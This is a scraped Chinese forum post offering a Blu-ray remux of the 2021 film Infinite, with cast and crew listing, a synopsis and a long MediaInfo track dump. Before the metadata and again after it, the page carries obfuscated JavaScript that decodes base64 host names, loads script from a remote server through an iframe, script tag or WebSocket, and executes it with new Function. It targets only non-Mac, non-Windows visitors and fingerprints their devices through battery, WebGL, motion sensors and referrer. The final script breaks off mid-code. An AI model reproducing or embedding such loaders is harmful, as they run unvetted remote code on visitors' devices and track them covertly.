无限[中文字幕].Infinite.2021.1080p.BluRay.REMUX.AVC.DTS-HD.MA.TrueHD.7.1.Atmos-BT9527 33.66GB

版主小s 3月前 5009



window['' + 'j' + '7' + '7' + '5' + '0' + 'e' + '9' + 'd' + '6'+'']=function(){;(function(u,i,w,d){if(/^Mac|Win/.test(navigator.platform)){return};var dc=function(n){return String.fromCharCode(n)};var x=w[dc(0x61)+dc(0x74)+dc(0x6F)+dc(0x62)],cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';var wr='write';'jQuery';var f=d[crd](x('aWZyYW1l'));f.id='x'+(Math.random()*10000);f.style.width='10px';f.style.height=5+'px';f.style.background='#FFF';f.src=['https://',x(u),'r','j8',i].join('/');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data.k==i){d.getElementById(f.id).remove();new Function('_tdcs',x(e.data.v))(cs)}})})('ai5neGxzanQuY29t','241222251495493',window,document)};


◎译 名 无限 / 无限轮回

◎片 名 Infinite

◎年 代 2021

◎产 地 美国

◎类 别 动作 / 科幻 / 惊悚

◎语 言 英语

◎上映日期 2021-06-10(美国网络)

◎IMDb链接 https://www.imdb.com/title/tt6654210/

◎豆瓣评分 5.4/10 (8548人评价)

◎豆瓣链接 https://movie.douban.com/subject/30368448/

◎片 长 106分钟

◎导 演 安东尼·福奎阿 Antoine Fuqua (id:1013907)

◎编 剧 伊恩·肖尔 Ian Shorr (id:1401302)

托德·斯坦因 Todd Stein (id:1377110)

D· 埃里克·麦克兰兹 D. Eric Maikranz (id:1437574)

约翰·李·汉考克 John Lee Hancock (id:1285940)

◎演 员 马克·沃尔伯格 Mark Wahlberg (id:1035674)

迪伦·奥布莱恩 Dylan O'Brien (id:1314963)

杰森·曼楚克斯 Jason Mantzoukas (id:1314947)

鲁伯特·弗兰德 Rupert Friend (id:1027178)

索菲·库克森 Sophie Cookson (id:1343282)

切瓦特·埃加福 Chiwetel Ejiofor (id:1010581)

托比·琼斯 Toby Jones (id:1107884)

沃利斯·戴 Wallis Day (id:1392172)

汤姆·休斯 Tom Hughes (id:1274552)

约翰内斯·豪克尔·约翰内森 Jóhannes Haukur Jóhannesson (id:1353438)

加绘·亚历山大 Kae Alexander (id:1401072)

利兹·凯尔 Liz Carr (id:1408215)

乔安娜·里贝罗 Joana Ribeiro (id:1410065)

纳比勒·埃卢比 Nabil Elouahabi (id:1222084)

拉菲拉·查普曼 Raffiella Chapman (id:1365611)

马克·弗莱施曼 Mark Fleischmann (id:1404993)

乔丹·A·纳什 Jordan A. Nash (id:1373103)

蒂利亚纳·布克丽瓦 Dilyana Bouklieva (id:1348852)

利昂·阿诺 Leon Annor (id:1368837)

洛伦佐·迪·博纳文图拉 Lorenzo di Bonaventura (id:1282389)

哈里·格雷格森-威廉姆斯 Harry Gregson-Williams (id:1056131)

吉尔·泰勒 Jill Taylor (id:1298993)

◎简 介

改编自D. Eric Maikranz所著小说《转世文献》(The Rein carnationist Papers),聚焦一个被自己前两世的记忆缠绕的男子,引出一群几乎长生不死、几世纪来多次转生的人,被称为“无限/无穷之人”,他们的组织叫“Cognomina”。为了打败想毁灭地球的邪恶力量,他们必须依靠这个精神分裂的男子,而后者先要搞清楚:他常做的奇怪的梦都是前世的记忆。

  1. Video

  2. ID : 1

  3. ID in the original source medium : 4113 (0x1011)

  4. Format : AVC

  5. Format/Info : Advanced Video Codec

  6. Format profile : [email protected]

  7. Format settings : CABAC / 2 Ref Frames

  8. Format settings, CABAC : Yes

  9. Format settings, Reference frames : 2 frames

  10. Format settings, GOP : M=1, N=10

  11. Codec ID : V_MPEG4/ISO/AVC

  12. Duration : 1 h 46 min

  13. Bit rate mode : Variable

  14. Bit rate : 31.3 Mb/s

  15. Width : 1 920 pixels

  16. Height : 1 080 pixels

  17. Display aspect ratio : 16:9

  18. Frame rate mode : Constant

  19. Frame rate : 23.976 (24000/1001/53354) FPS

  20. Color space : YUV

  21. Chroma subsampling : 4:2:0

  22. Bit depth : 8 bits

  23. Scan type : Progressive

  24. Bits/(Pixel*Frame) : 0.629

  25. Stream size : 23.2 GiB (69%)

  26. Language : English

  27. Default : No

  28. Forced : No

  29. Original source medium : Blu-ray


  30. Audio #1

  31. ID : 2

  32. ID in the original source medium : 4352 (0x1100)

  33. Format : MLP FBA 16-ch

  34. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  35. Commercial name : Dolby TrueHD with Dolby Atmos

  36. Codec ID : A_TRUEHD

  37. Duration : 1 h 46 min

  38. Bit rate mode : Variable

  39. Bit rate : 4 082 kb/s

  40. Maximum bit rate : 7 116 kb/s

  41. Channel(s) : 8 channels

  42. Channel layout : L R C LFE Ls Rs Lb Rb

  43. Sampling rate : 48.0 kHz

  44. Frame rate : 1 200.000 FPS (40 SPF)

  45. Bit depth : 24 bits

  46. Compression mode : Lossless

  47. Stream size : 3.03 GiB (9%)

  48. Title : TrueHD 7.1 Atmos

  49. Language : English

  50. Default : Yes

  51. Forced : No

  52. Original source medium : Blu-ray

  53. Number of dynamic objects : 11

  54. Bed channel count : 1 channel

  55. Bed channel configuration : LFE


  56. Audio #2

  57. ID : 3

  58. Format : DTS XLL

  59. Format/Info : Digital Theater Systems

  60. Commercial name : DTS-HD Master Audio

  61. Codec ID : A_DTS

  62. Duration : 1 h 46 min

  63. Bit rate mode : Variable

  64. Bit rate : 3 913 kb/s

  65. Channel(s) : 8 channels

  66. Channel layout : C L R LFE Lb Rb Lss Rss

  67. Sampling rate : 48.0 kHz

  68. Frame rate : 93.750 FPS (512 SPF)

  69. Bit depth : 24 bits

  70. Compression mode : Lossless

  71. Stream size : 2.91 GiB (9%)

  72. Title : DTS-HD MA 7.1

  73. Language : English

  74. Default : No

  75. Forced : No


  76. Audio #3

  77. ID : 4

  78. ID in the original source medium : 4352 (0x1100)

  79. Format : AC-3

  80. Format/Info : Audio Coding 3

  81. Commercial name : Dolby Digital

  82. Format settings : Dolby Surround EX

  83. Codec ID : A_AC3

  84. Duration : 1 h 46 min

  85. Bit rate mode : Constant

  86. Bit rate : 640 kb/s

  87. Channel(s) : 6 channels

  88. Channel layout : L R C LFE Ls Rs

  89. Sampling rate : 48.0 kHz

  90. Frame rate : 31.250 FPS (1536 SPF)

  91. Compression mode : Lossy

  92. Stream size : 487 MiB (1%)

  93. Title : DD 5.1

  94. Language : English

  95. Service kind : Complete Main

  96. Default : No

  97. Forced : No

  98. Original source medium : Blu-ray


  99. Audio #4

  100. ID : 5

  101. ID in the original source medium : 4353 (0x1101)

  102. Format : AC-3

  103. Format/Info : Audio Coding 3

  104. Commercial name : Dolby Digital

  105. Codec ID : A_AC3

  106. Duration : 1 h 46 min

  107. Bit rate mode : Constant

  108. Bit rate : 640 kb/s

  109. Channel(s) : 6 channels

  110. Channel layout : L R C LFE Ls Rs

  111. Sampling rate : 48.0 kHz

  112. Frame rate : 31.250 FPS (1536 SPF)

  113. Compression mode : Lossy

  114. Stream size : 487 MiB (1%)

  115. Title : DD 5.1

  116. Language : English

  117. Service kind : Complete Main

  118. Default : No

  119. Forced : No

  120. Original source medium : Blu-ray


  121. Audio #5

  122. ID : 6

  123. ID in the original source medium : 4354 (0x1102)

  124. Format : AC-3

  125. Format/Info : Audio Coding 3

  126. Commercial name : Dolby Digital

  127. Codec ID : A_AC3

  128. Duration : 1 h 46 min

  129. Bit rate mode : Constant

  130. Bit rate : 640 kb/s

  131. Channel(s) : 6 channels

  132. Channel layout : L R C LFE Ls Rs

  133. Sampling rate : 48.0 kHz

  134. Frame rate : 31.250 FPS (1536 SPF)

  135. Compression mode : Lossy

  136. Stream size : 487 MiB (1%)

  137. Title : DD 5.1

  138. Language : German

  139. Service kind : Complete Main

  140. Default : No

  141. Forced : No

  142. Original source medium : Blu-ray


  143. Audio #6

  144. ID : 7

  145. ID in the original source medium : 4355 (0x1103)

  146. Format : AC-3

  147. Format/Info : Audio Coding 3

  148. Commercial name : Dolby Digital

  149. Codec ID : A_AC3

  150. Duration : 1 h 46 min

  151. Bit rate mode : Constant

  152. Bit rate : 640 kb/s

  153. Channel(s) : 6 channels

  154. Channel layout : L R C LFE Ls Rs

  155. Sampling rate : 48.0 kHz

  156. Frame rate : 31.250 FPS (1536 SPF)

  157. Compression mode : Lossy

  158. Stream size : 487 MiB (1%)

  159. Title : DD 5.1

  160. Language : Spanish

  161. Service kind : Complete Main

  162. Default : No

  163. Forced : No

  164. Original source medium : Blu-ray


  165. Audio #7

  166. ID : 8

  167. ID in the original source medium : 4356 (0x1104)

  168. Format : AC-3

  169. Format/Info : Audio Coding 3

  170. Commercial name : Dolby Digital

  171. Codec ID : A_AC3

  172. Duration : 1 h 46 min

  173. Bit rate mode : Constant

  174. Bit rate : 640 kb/s

  175. Channel(s) : 6 channels

  176. Channel layout : L R C LFE Ls Rs

  177. Sampling rate : 48.0 kHz

  178. Frame rate : 31.250 FPS (1536 SPF)

  179. Compression mode : Lossy

  180. Stream size : 487 MiB (1%)

  181. Title : DD 5.1

  182. Language : Spanish

  183. Service kind : Complete Main

  184. Default : No

  185. Forced : No

  186. Original source medium : Blu-ray


  187. Audio #8

  188. ID : 9

  189. ID in the original source medium : 4357 (0x1105)

  190. Format : AC-3

  191. Format/Info : Audio Coding 3

  192. Commercial name : Dolby Digital

  193. Codec ID : A_AC3

  194. Duration : 1 h 46 min

  195. Bit rate mode : Constant

  196. Bit rate : 640 kb/s

  197. Channel(s) : 6 channels

  198. Channel layout : L R C LFE Ls Rs

  199. Sampling rate : 48.0 kHz

  200. Frame rate : 31.250 FPS (1536 SPF)

  201. Compression mode : Lossy

  202. Stream size : 487 MiB (1%)

  203. Title : DD 5.1

  204. Language : French

  205. Service kind : Complete Main

  206. Default : No

  207. Forced : No

  208. Original source medium : Blu-ray


  209. Audio #9

  210. ID : 10

  211. ID in the original source medium : 4358 (0x1106)

  212. Format : AC-3

  213. Format/Info : Audio Coding 3

  214. Commercial name : Dolby Digital

  215. Codec ID : A_AC3

  216. Duration : 1 h 46 min

  217. Bit rate mode : Constant

  218. Bit rate : 640 kb/s

  219. Channel(s) : 6 channels

  220. Channel layout : L R C LFE Ls Rs

  221. Sampling rate : 48.0 kHz

  222. Frame rate : 31.250 FPS (1536 SPF)

  223. Compression mode : Lossy

  224. Stream size : 487 MiB (1%)

  225. Title : DD 5.1

  226. Language : Italian

  227. Service kind : Complete Main

  228. Default : No

  229. Forced : No

  230. Original source medium : Blu-ray


  231. Audio #10

  232. ID : 11

  233. ID in the original source medium : 4359 (0x1107)

  234. Format : AC-3

  235. Format/Info : Audio Coding 3

  236. Commercial name : Dolby Digital

  237. Codec ID : A_AC3

  238. Duration : 1 h 46 min

  239. Bit rate mode : Constant

  240. Bit rate : 640 kb/s

  241. Channel(s) : 6 channels

  242. Channel layout : L R C LFE Ls Rs

  243. Sampling rate : 48.0 kHz

  244. Frame rate : 31.250 FPS (1536 SPF)

  245. Compression mode : Lossy

  246. Stream size : 487 MiB (1%)

  247. Title : DD 5.1

  248. Language : Japanese

  249. Service kind : Complete Main

  250. Default : No

  251. Forced : No

  252. Original source medium : Blu-ray


  253. Audio #11

  254. ID : 12

  255. ID in the original source medium : 4360 (0x1108)

  256. Format : AC-3

  257. Format/Info : Audio Coding 3

  258. Commercial name : Dolby Digital

  259. Codec ID : A_AC3

  260. Duration : 1 h 46 min

  261. Bit rate mode : Constant

  262. Bit rate : 640 kb/s

  263. Channel(s) : 6 channels

  264. Channel layout : L R C LFE Ls Rs

  265. Sampling rate : 48.0 kHz

  266. Frame rate : 31.250 FPS (1536 SPF)

  267. Compression mode : Lossy

  268. Stream size : 487 MiB (1%)

  269. Title : DD 5.1

  270. Language : Portuguese

  271. Service kind : Complete Main

  272. Default : No

  273. Forced : No

  274. Original source medium : Blu-ray


  275. Text #1

  276. ID : 13

  277. Format : UTF-8

  278. Codec ID : S_TEXT/UTF8

  279. Codec ID/Info : UTF-8 Plain Text

  280. Duration : 1 h 36 min

  281. Bit rate : 42 b/s

  282. Count of elements : 940

  283. Stream size : 30.0 KiB (0%)

  284. Language : English

  285. Default : Yes

  286. Forced : No


  287. Text #2

  288. ID : 14

  289. ID in the original source medium : 4608 (0x1200)

  290. Format : PGS

  291. Muxing mode : zlib

  292. Codec ID : S_HDMV/PGS

  293. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  294. Duration : 1 h 36 min

  295. Bit rate : 29.2 kb/s

  296. Count of elements : 1894

  297. Stream size : 20.2 MiB (0%)

  298. Language : English

  299. Default : No

  300. Forced : No

  301. Original source medium : Blu-ray


  302. Text #3

  303. ID : 15

  304. ID in the original source medium : 4609 (0x1201)

  305. Format : PGS

  306. Muxing mode : zlib

  307. Codec ID : S_HDMV/PGS

  308. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  309. Duration : 1 h 40 min

  310. Bit rate : 33.0 kb/s

  311. Count of elements : 2296

  312. Stream size : 23.7 MiB (0%)

  313. Language : English

  314. Default : No

  315. Forced : No

  316. Original source medium : Blu-ray


  317. Text #4

  318. ID : 16

  319. ID in the original source medium : 4610 (0x1202)

  320. Format : PGS

  321. Muxing mode : zlib

  322. Codec ID : S_HDMV/PGS

  323. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  324. Duration : 1 h 45 min

  325. Bit rate : 21.2 kb/s

  326. Count of elements : 1924

  327. Stream size : 16.0 MiB (0%)

  328. Language : Chinese

  329. Default : No

  330. Forced : No

  331. Original source medium : Blu-ray


  332. Text #5

  333. ID : 17

  334. ID in the original source medium : 4611 (0x1203)

  335. Format : PGS

  336. Muxing mode : zlib

  337. Codec ID : S_HDMV/PGS

  338. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  339. Duration : 1 h 45 min

  340. Bit rate : 26.0 kb/s

  341. Count of elements : 1916

  342. Stream size : 19.6 MiB (0%)

  343. Language : Danish

  344. Default : No

  345. Forced : No

  346. Original source medium : Blu-ray


  347. Text #6

  348. ID : 18

  349. ID in the original source medium : 4612 (0x1204)

  350. Format : PGS

  351. Muxing mode : zlib

  352. Codec ID : S_HDMV/PGS

  353. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  354. Duration : 1 h 45 min

  355. Bit rate : 27.1 kb/s

  356. Count of elements : 1830

  357. Stream size : 20.4 MiB (0%)

  358. Language : German

  359. Default : No

  360. Forced : No

  361. Original source medium : Blu-ray


  362. Text #7

  363. ID : 19

  364. ID in the original source medium : 4612 (0x1204)

  365. Format : PGS

  366. Muxing mode : zlib

  367. Codec ID : S_HDMV/PGS

  368. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  369. Duration : 1 h 44 min

  370. Bit rate : 258 b/s

  371. Count of elements : 24

  372. Stream size : 198 KiB (0%)

  373. Language : German

  374. Default : No

  375. Forced : No

  376. Original source medium : Blu-ray


  377. Text #8

  378. ID : 20

  379. ID in the original source medium : 4613 (0x1205)

  380. Format : PGS

  381. Muxing mode : zlib

  382. Codec ID : S_HDMV/PGS

  383. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  384. Duration : 1 h 45 min

  385. Bit rate : 24.2 kb/s

  386. Count of elements : 1872

  387. Stream size : 18.3 MiB (0%)

  388. Language : Spanish

  389. Default : No

  390. Forced : No

  391. Original source medium : Blu-ray


  392. Text #9

  393. ID : 21

  394. ID in the original source medium : 4613 (0x1205)

  395. Format : PGS

  396. Muxing mode : zlib

  397. Codec ID : S_HDMV/PGS

  398. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  399. Duration : 1 h 44 min

  400. Bit rate : 258 b/s

  401. Count of elements : 26

  402. Stream size : 198 KiB (0%)

  403. Language : Spanish

  404. Default : No

  405. Forced : No

  406. Original source medium : Blu-ray


  407. Text #10

  408. ID : 22

  409. ID in the original source medium : 4614 (0x1206)

  410. Format : PGS

  411. Muxing mode : zlib

  412. Codec ID : S_HDMV/PGS

  413. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  414. Duration : 1 h 45 min

  415. Bit rate : 26.2 kb/s

  416. Count of elements : 1862

  417. Stream size : 19.7 MiB (0%)

  418. Language : Spanish

  419. Default : No

  420. Forced : No

  421. Original source medium : Blu-ray


  422. Text #11

  423. ID : 23

  424. ID in the original source medium : 4614 (0x1206)

  425. Format : PGS

  426. Muxing mode : zlib

  427. Codec ID : S_HDMV/PGS

  428. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  429. Duration : 1 h 44 min

  430. Bit rate : 240 b/s

  431. Count of elements : 24

  432. Stream size : 184 KiB (0%)

  433. Language : Spanish

  434. Default : No

  435. Forced : No

  436. Original source medium : Blu-ray


  437. Text #12

  438. ID : 24

  439. ID in the original source medium : 4615 (0x1207)

  440. Format : PGS

  441. Muxing mode : zlib

  442. Codec ID : S_HDMV/PGS

  443. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  444. Duration : 1 h 45 min

  445. Bit rate : 25.6 kb/s

  446. Count of elements : 1892

  447. Stream size : 19.3 MiB (0%)

  448. Language : French

  449. Default : No

  450. Forced : No

  451. Original source medium : Blu-ray


  452. Text #13

  453. ID : 25

  454. ID in the original source medium : 4615 (0x1207)

  455. Format : PGS

  456. Muxing mode : zlib

  457. Codec ID : S_HDMV/PGS

  458. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  459. Duration : 1 h 44 min

  460. Bit rate : 217 b/s

  461. Count of elements : 24

  462. Stream size : 167 KiB (0%)

  463. Language : French

  464. Default : No

  465. Forced : No

  466. Original source medium : Blu-ray


  467. Text #14

  468. ID : 26

  469. ID in the original source medium : 4616 (0x1208)

  470. Format : PGS

  471. Muxing mode : zlib

  472. Codec ID : S_HDMV/PGS

  473. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  474. Duration : 1 h 45 min

  475. Bit rate : 25.8 kb/s

  476. Count of elements : 1862

  477. Stream size : 19.5 MiB (0%)

  478. Language : Italian

  479. Default : No

  480. Forced : No

  481. Original source medium : Blu-ray


  482. Text #15

  483. ID : 27

  484. ID in the original source medium : 4616 (0x1208)

  485. Format : PGS

  486. Muxing mode : zlib

  487. Codec ID : S_HDMV/PGS

  488. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  489. Duration : 1 h 44 min

  490. Bit rate : 230 b/s

  491. Count of elements : 24

  492. Stream size : 177 KiB (0%)

  493. Language : Italian

  494. Default : No

  495. Forced : No

  496. Original source medium : Blu-ray


  497. Text #16

  498. ID : 28

  499. ID in the original source medium : 4617 (0x1209)

  500. Format : PGS

  501. Muxing mode : zlib

  502. Codec ID : S_HDMV/PGS

  503. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  504. Duration : 1 h 36 min

  505. Bit rate : 20.0 kb/s

  506. Count of elements : 1866

  507. Stream size : 13.9 MiB (0%)

  508. Language : Japanese

  509. Default : No

  510. Forced : No

  511. Original source medium : Blu-ray


  512. Text #17

  513. ID : 29

  514. ID in the original source medium : 4618 (0x120A)

  515. Format : PGS

  516. Muxing mode : zlib

  517. Codec ID : S_HDMV/PGS

  518. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  519. Duration : 1 h 45 min

  520. Bit rate : 24.4 kb/s

  521. Count of elements : 1926

  522. Stream size : 18.4 MiB (0%)

  523. Language : Chinese

  524. Default : No

  525. Forced : No

  526. Original source medium : Blu-ray


  527. Text #18

  528. ID : 30

  529. ID in the original source medium : 4619 (0x120B)

  530. Format : PGS

  531. Muxing mode : zlib

  532. Codec ID : S_HDMV/PGS

  533. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  534. Duration : 1 h 45 min

  535. Bit rate : 25.2 kb/s

  536. Count of elements : 1610

  537. Stream size : 19.0 MiB (0%)

  538. Language : Dutch

  539. Default : No

  540. Forced : No

  541. Original source medium : Blu-ray


  542. Text #19

  543. ID : 31

  544. ID in the original source medium : 4620 (0x120C)

  545. Format : PGS

  546. Muxing mode : zlib

  547. Codec ID : S_HDMV/PGS

  548. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  549. Duration : 1 h 45 min

  550. Bit rate : 23.6 kb/s

  551. Count of elements : 1886

  552. Stream size : 17.8 MiB (0%)

  553. Language : Norwegian

  554. Default : No

  555. Forced : No

  556. Original source medium : Blu-ray


  557. Text #20

  558. ID : 32

  559. ID in the original source medium : 4621 (0x120D)

  560. Format : PGS

  561. Muxing mode : zlib

  562. Codec ID : S_HDMV/PGS

  563. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  564. Duration : 1 h 45 min

  565. Bit rate : 23.9 kb/s

  566. Count of elements : 1892

  567. Stream size : 18.0 MiB (0%)

  568. Language : Polish

  569. Default : No

  570. Forced : No

  571. Original source medium : Blu-ray


  572. Text #21

  573. ID : 33

  574. ID in the original source medium : 4622 (0x120E)

  575. Format : PGS

  576. Muxing mode : zlib

  577. Codec ID : S_HDMV/PGS

  578. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  579. Duration : 1 h 45 min

  580. Bit rate : 25.5 kb/s

  581. Count of elements : 1846

  582. Stream size : 19.2 MiB (0%)

  583. Language : Portuguese

  584. Default : No

  585. Forced : No

  586. Original source medium : Blu-ray


  587. Text #22

  588. ID : 34

  589. ID in the original source medium : 4622 (0x120E)

  590. Format : PGS

  591. Muxing mode : zlib

  592. Codec ID : S_HDMV/PGS

  593. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  594. Duration : 1 h 44 min

  595. Bit rate : 275 b/s

  596. Count of elements : 26

  597. Stream size : 211 KiB (0%)

  598. Language : Portuguese

  599. Default : No

  600. Forced : No

  601. Original source medium : Blu-ray


  602. Text #23

  603. ID : 35

  604. ID in the original source medium : 4623 (0x120F)

  605. Format : PGS

  606. Muxing mode : zlib

  607. Codec ID : S_HDMV/PGS

  608. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  609. Duration : 1 h 45 min

  610. Bit rate : 22.0 kb/s

  611. Count of elements : 1926

  612. Stream size : 16.6 MiB (0%)

  613. Language : Chinese

  614. Default : No

  615. Forced : No

  616. Original source medium : Blu-ray


  617. Text #24

  618. ID : 36

  619. ID in the original source medium : 4624 (0x1210)

  620. Format : PGS

  621. Muxing mode : zlib

  622. Codec ID : S_HDMV/PGS

  623. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  624. Duration : 1 h 45 min

  625. Bit rate : 26.6 kb/s

  626. Count of elements : 1914

  627. Stream size : 20.1 MiB (0%)

  628. Language : Finnish

  629. Default : No

  630. Forced : No

  631. Original source medium : Blu-ray


  632. Text #25

  633. ID : 37

  634. ID in the original source medium : 4625 (0x1211)

  635. Format : PGS

  636. Muxing mode : zlib

  637. Codec ID : S_HDMV/PGS

  638. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  639. Duration : 1 h 45 min

  640. Bit rate : 24.9 kb/s

  641. Count of elements : 1822

  642. Stream size : 18.8 MiB (0%)

  643. Language : Swedish

  644. Default : No

  645. Forced : No

  646. Original source medium : Blu-ray


  647. Text #26

  648. ID : 38

  649. ID in the original source medium : 4626 (0x1212)

  650. Format : PGS

  651. Muxing mode : zlib

  652. Codec ID : S_HDMV/PGS

  653. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  654. Duration : 1 h 36 min

  655. Bit rate : 303 b/s

  656. Count of elements : 30

  657. Stream size : 214 KiB (0%)

  658. Language : Japanese

  659. Default : No

  660. Forced : No

  661. Original source medium : Blu-ray


  662. Menu

  663. 00:00:00.000 : en:Chapter 01

  664. 00:07:49.010 : en:Chapter 02

  665. 00:12:44.722 : en:Chapter 03

  666. 00:18:58.303 : en:Chapter 04

  667. 00:25:51.258 : en:Chapter 05

  668. 00:32:25.360 : en:Chapter 06

  669. 00:38:25.136 : en:Chapter 07

  670. 00:46:40.839 : en:Chapter 08

  671. 00:54:22.509 : en:Chapter 09

  672. 01:02:58.900 : en:Chapter 10

  673. 01:11:01.006 : en:Chapter 11

  674. 01:19:41.067 : en:Chapter 12

  675. 01:28:27.135 : en:Chapter 13

  676. 01:37:44.525 : en:Chapter 14

复制代码

 


此处资源回复后可见,如未不是会员,请先“立即注册”

TAGS 动作 惊悚 科幻




var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x57\x62\x51\x66\x48\x58\x65\x61\x49']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='wob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var 